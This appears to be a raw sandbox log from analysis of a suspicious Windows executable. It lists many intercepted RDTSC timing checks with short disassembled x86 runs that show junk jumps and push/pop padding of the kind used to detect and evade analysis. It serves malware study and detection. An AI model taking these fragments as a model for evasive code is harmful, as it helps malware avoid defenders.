Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2BD959 second address: 2BD95F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2BD95F second address: 2BD9A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F6035561AD6h 0x0000000a popad 0x0000000b jnc 00007F6035561ADAh 0x00000011 jmp 00007F6035561AE3h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jl 00007F6035561AE6h 0x0000001f jmp 00007F6035561AE0h 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2BD9A4 second address: 2BD9B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6034D241CDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2BD9B5 second address: 2BD9CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6035561ADCh 0x00000007 js 00007F6035561AD6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2C48FA second address: 2C492D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6034D241D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007F6034D241D6h 0x0000000f jmp 00007F6034D241CAh 0x00000014 jp 00007F6034D241C6h 0x0000001a pop edi 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2C492D second address: 2C4931 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2C4931 second address: 2C4937 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2C4937 second address: 2C493D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2C493D second address: 2C4941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2C7F32 second address: 2C7F36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2C7F36 second address: 2C7F3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2C7F3A second address: 2C7F40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2CE64B second address: 2CE651 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2CE651 second address: 2CE673 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jo 00007F6035561AD6h 0x0000000b jmp 00007F6035561AE5h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2CE7AF second address: 2CE7DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6034D241CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007F6034D241D0h 0x00000011 jp 00007F6034D241C6h 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2CE7DA second address: 2CE7E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2CE7E3 second address: 2CE7E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2CE7E7 second address: 2CE7F5 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6035561AD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2CEC65 second address: 2CEC6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2CEC6F second address: 2CEC9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6035561AE5h 0x00000009 jmp 00007F6035561ADAh 0x0000000e popad 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 js 00007F6035561AE2h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2CEC9E second address: 2CECA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F6034D241C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2CF117 second address: 2CF11F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2CF11F second address: 2CF124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2D5C1D second address: 2D5C49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F6035561AD6h 0x0000000a jmp 00007F6035561AE3h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F6035561ADCh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2D5C49 second address: 2D5C53 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6034D241C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2D5C53 second address: 2D5C65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6035561ADAh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2D5C65 second address: 2D5C79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6034D241D0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2D9732 second address: 2D9742 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jns 00007F6035561AD6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 3096B7 second address: 3096D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007F6034D241C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F6034D241CEh 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 3096D9 second address: 3096DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 308900 second address: 308918 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6034D241CCh 0x00000007 jp 00007F6034D241CEh 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 308A7C second address: 308AB0 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6035561AD6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F6035561ADEh 0x00000011 jmp 00007F6035561ADAh 0x00000016 push edx 0x00000017 jo 00007F6035561AD6h 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f pop edx 0x00000020 popad 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 308AB0 second address: 308AB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 308AB6 second address: 308ABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 308ABA second address: 308ABE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 309001 second address: 309005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 30D65F second address: 30D665 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 30DCE9 second address: 30DD49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jl 00007F6035561AD6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007F6035561AD8h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b push dword ptr [ebp+122D2DBFh] 0x00000031 mov edx, dword ptr [ebp+122D3706h] 0x00000037 xor dword ptr [ebp+122D203Dh], edi 0x0000003d push 5DC2BD9Ch 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F6035561AE2h 0x0000004b rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 30DD49 second address: 30DD4F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 30DD4F second address: 30DD55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 30DD55 second address: 30DD59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 30DD59 second address: 30DD5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 310FED second address: 310FF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 310FF1 second address: 31100C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6035561ADFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jbe 00007F6035561AE2h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 31100C second address: 311012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 230CDC second address: 230CE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 230F04 second address: 230F08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2310A6 second address: 2310AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2310AA second address: 2310B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 525023D second address: 525024E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6035561ADDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 525024E second address: 5250252 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 525030D second address: 5250313 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 230EF4 second address: 230F04 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6034D241C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 52706C6 second address: 5270736 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6035561ADBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov edx, 418316AAh 0x00000010 pushfd 0x00000011 jmp 00007F6035561ADBh 0x00000016 or si, FB4Eh 0x0000001b jmp 00007F6035561AE9h 0x00000020 popfd 0x00000021 popad 0x00000022 xchg eax, ebp 0x00000023 jmp 00007F6035561ADEh 0x00000028 mov ebp, esp 0x0000002a pushad 0x0000002b mov edi, esi 0x0000002d mov bx, si 0x00000030 popad 0x00000031 xchg eax, ecx 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 mov ax, dx 0x00000038 call 00007F6035561ADDh 0x0000003d pop eax 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 5270736 second address: 5270794 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6034D241CCh 0x00000008 pushfd 0x00000009 jmp 00007F6034D241D2h 0x0000000e sub cx, 1488h 0x00000013 jmp 00007F6034D241CBh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F6034D241D2h 0x00000026 adc ch, FFFFFFE8h 0x00000029 jmp 00007F6034D241CBh 0x0000002e popfd 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 5270794 second address: 5270799 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 5270799 second address: 52707CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6034D241CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b mov cx, E7EBh 0x0000000f mov bx, si 0x00000012 popad 0x00000013 xchg eax, esi 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F6034D241D4h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 52707CF second address: 52707D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 52707D3 second address: 52707D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 52707D9 second address: 52707DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 52707DF second address: 52707E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 52707E3 second address: 5270834 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6035561AE8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov ebx, 34B5B2B4h 0x00000012 popad 0x00000013 xchg eax, esi 0x00000014 jmp 00007F6035561AE6h 0x00000019 lea eax, dword ptr [ebp-04h] 0x0000001c pushad 0x0000001d mov eax, 4E624FBDh 0x00000022 mov di, si 0x00000025 popad 0x00000026 nop 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 5270834 second address: 5270838 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 5270838 second address: 527083E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 527083E second address: 527086B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6034D241D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6034D241CEh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 527086B second address: 5270871 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 5270871 second address: 527088D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6034D241CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov esi, edx 0x00000011 mov eax, edi 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 5270959 second address: 527099C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, 61ADE1B9h 0x00000009 popad 0x0000000a call 00007F6035561AE6h 0x0000000f mov edx, esi 0x00000011 pop ecx 0x00000012 popad 0x00000013 mov eax, esi 0x00000015 jmp 00007F6035561ADDh 0x0000001a pop esi 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F6035561ADDh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 527099C second address: 5260073 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6034D241D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a jmp 00007F6034D241CEh 0x0000000f retn 0004h 0x00000012 nop 0x00000013 cmp eax, 00000000h 0x00000016 setne al 0x00000019 jmp 00007F6034D241C2h 0x0000001b xor ebx, ebx 0x0000001d test al, 01h 0x0000001f jne 00007F6034D241C7h 0x00000021 sub esp, 04h 0x00000024 mov dword ptr [esp], 0000000Dh 0x0000002b call 00007F6039F217BBh 0x00000030 mov edi, edi 0x00000032 jmp 00007F6034D241D0h 0x00000037 xchg eax, ebp 0x00000038 jmp 00007F6034D241D0h 0x0000003d push eax 0x0000003e jmp 00007F6034D241CBh 0x00000043 xchg eax, ebp 0x00000044 pushad 0x00000045 push esi 0x00000046 pushfd 0x00000047 jmp 00007F6034D241D7h 0x0000004c sub cx, FE9Eh 0x00000051 jmp 00007F6034D241D9h 0x00000056 popfd 0x00000057 pop eax 0x00000058 popad 0x00000059 mov ebp, esp 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 popad 0x00000061 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 5260073 second address: 5260079 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 5260079 second address: 52600AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6034D241CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 2Ch 0x0000000c pushad 0x0000000d mov edi, eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushfd 0x00000012 jmp 00007F6034D241CEh 0x00000017 sub cl, FFFFFFF8h 0x0000001a jmp 00007F6034D241CBh 0x0000001f popfd 0x00000020 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 52600AE second address: 52600DC instructions: 0x00000000 rdtsc 0x00000002 call 00007F6035561AE8h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6035561ADDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 52600DC second address: 5260160 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 76329CD2h 0x00000008 pushfd 0x00000009 jmp 00007F6034D241D3h 0x0000000e sbb esi, 450960CEh 0x00000014 jmp 00007F6034D241D9h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov dword ptr [esp], ebx 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F6034D241CCh 0x00000027 jmp 00007F6034D241D5h 0x0000002c popfd 0x0000002d mov ax, 90B7h 0x00000031 popad 0x00000032 xchg eax, edi 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F6034D241D4h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 5260160 second address: 526016F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6035561ADBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 526016F second address: 52601D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6034D241CFh 0x00000009 adc cx, 699Eh 0x0000000e jmp 00007F6034D241D9h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F6034D241CAh 0x0000001f jmp 00007F6034D241D5h 0x00000024 popfd 0x00000025 mov cx, 7F47h 0x00000029 popad 0x0000002a xchg eax, edi 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 5260225 second address: 5260229 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 5260229 second address: 526022F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 526022F second address: 5260235 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 5260235 second address: 5260239 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 5260239 second address: 5260262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F6035561CBAh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F6035561AE9h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 5260262 second address: 5260268 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 5260268 second address: 526026C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 526026C second address: 5260270 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 526038A second address: 52603A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6035561ADBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
